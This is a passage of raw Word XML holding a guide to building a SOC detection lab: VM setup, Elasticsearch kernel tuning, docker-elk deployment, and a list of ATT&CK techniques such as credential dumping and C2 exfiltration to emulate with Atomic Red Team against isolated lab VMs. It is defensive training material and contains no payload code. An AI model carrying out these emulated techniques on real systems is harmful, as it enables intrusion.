        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>Create VM for Linux test host: Ubuntu 22.04, 4 GB RAM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589EF639" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>(Optional) Kali Linux VM for attacker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6558C9AA" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve">After setting up each VM and updating it, </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA611A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>take a snapshot</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA611A">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3D5A3F" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Links</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EBBF469" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve">Ubuntu images: </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00DA611A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://ubuntu.com/download</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4B9C2B99" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve">Windows evaluation ISOs: </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00DA611A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.microsoft.com/en-us/evalcenter</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4141630D" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>Kali Linux: https://www.kali.org/get-kali/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0481B4BB" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00000000" w:rsidP="00DA611A">
      <w:r>
        <w:pict w14:anchorId="40BA3691">
          <v:rect id="_x0000_i1031" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFF1696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D. Set kernel parameter for Elasticsearch (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>vm.max_map_count</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B128296" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve"> Elasticsearch requires </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>vm.max_map_count</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve"> to be set high enough.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30288557" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command (run on the ELK host VM — Linux):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D903413" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:t># temporary (until reboot)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="402A6BBC" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>sysctl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve"> -w </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>vm.max_map_count</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>=262144</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3673D2EE" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A"/>
    <w:p w14:paraId="146FC0D1" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:t># permanent (persist across reboots)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E44C8ED" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:t>echo '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>vm.max_map_count</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve">=262144' | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve"> tee -a /etc/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>sysctl.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4FDCEC03" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>sysctl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve"> -p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6957069B" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Link</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA54824" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Elastic doc: </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:anchor="docker-cli-run-prod-mode" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00DA611A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.elastic.co/guide/en/elasticsearch/reference/current/docker.html#docker-cli-run-prod-mode</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="41CD7321" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00000000" w:rsidP="00DA611A">
      <w:r>
        <w:pict w14:anchorId="42CC35D0">
          <v:rect id="_x0000_i1032" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C6A1F8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E. Create simple architecture diagram</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C404690" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>Draw a simple diagram showing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08DFE73F" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>Data Sources (Windows host, Linux host, Suricata) → Beats → Logstash → Elasticsearch → Kibana → Response (SOAR/Ticketing).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B719B5" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>Save as docs/architecture.png and add to repo README.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B61E29C" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>You can use draw.io (diagrams.net) to draw it quickly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553F5ACE" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8B6C65" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>diagrams.net (draw.io): https://app.diagrams.net/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51CA5D8B" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00000000" w:rsidP="00DA611A">
      <w:r>
        <w:pict w14:anchorId="2F393DF0">
          <v:rect id="_x0000_i1033" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B738B44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F. Choose ELK deployment method (Docker Compose recommended for POC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB28D83" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve">For beginners, we recommend </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>deviantony</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>/docker-elk because it is well-documented and quick.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EEBC451" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Clone repo (on ELK host VM):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D7164B" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:t># On ELK VM (Ubuntu)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477EFDEF" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve"> apt update &amp;&amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve"> apt upgrade -y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE086A0" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:t># Install Docker &amp; Docker Compose (if not already)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599988EE" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:t># Docker: https://docs.docker.com/engine/install/ubuntu/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7227065F" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:t># Compose: https://docs.docker.com/compose/install/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2C6AA3" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A"/>
    <w:p w14:paraId="6903E06E" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:t># Clone docker-elk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C5C768" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:t>git clone https://github.com/deviantony/docker-elk.git</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="427FCCC1" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:t>cd docker-elk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BDED823" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A"/>
    <w:p w14:paraId="6F169040" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:t># Before starting, edit .env if you want custom passwords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA8E9C6" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:t>docker compose up -d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1D3AF5" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Links</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626B7D4D" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve">docker-elk: </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00DA611A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/deviantony/docker-elk</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="50B2EAEF" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>Docker install (Ubuntu): https://docs.docker.com/engine/install/ubuntu/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AEBA53E" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:lastRenderedPageBreak/>
        <w:t>Docker Compose: https://docs.docker.com/compose/install/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2F343C" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00000000" w:rsidP="00DA611A">
      <w:r>
        <w:pict w14:anchorId="4209DDB4">
          <v:rect id="_x0000_i1034" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F3AD40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G. Pick initial APT techniques to emulate (Atomic Red Team)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4A46B7" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve">Go to Atomic Red Team: </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00DA611A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/redcanaryco/atomic-red-team</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00DA611A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.atomicredteam.io/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0587CBDA" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve">Choose </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA611A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6 techniques</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve"> to test detection rules for example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A416DA" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>T1059.001 — PowerShell (command execution)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430D8CED" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>T1021 — Remote Services (RDP/SSH)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E430DE" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>T1003 — Credential Dumping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4233AD82" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>T1041 — Exfiltration Over C2 Channel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53942D9D" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>T1078 — Valid Accounts (suspicious logins)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A6D49F" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>T1055 — Process Injection (Advanced)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7937C9E0" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>Put the technique list in repo: atomic-tests/selected-techniques.md</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4888CA" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Important Safety Note:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve"> Run these only in isolated lab VMs, never on production systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B4954F" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Links</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD0CF23" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve">Atomic Red Team: </w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00DA611A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/redcanaryco/atomic-red-team</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="44A770F1" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve">MITRE ATT&amp;CK: </w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00DA611A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://attack.mitre.org/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="66A4B7DF" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00000000" w:rsidP="00DA611A">
      <w:r>
        <w:pict w14:anchorId="0F8B211A">
          <v:rect id="_x0000_i1035" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="582EDC8C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H. Create Safety &amp; Recovery runbook</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CFCE57" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:t>Put a docs/runbook.md covering:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772B8D29" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>How to stop tests (kill process, remove network interface).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD34884" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>How to revert VM snapshot.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3091DC13" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
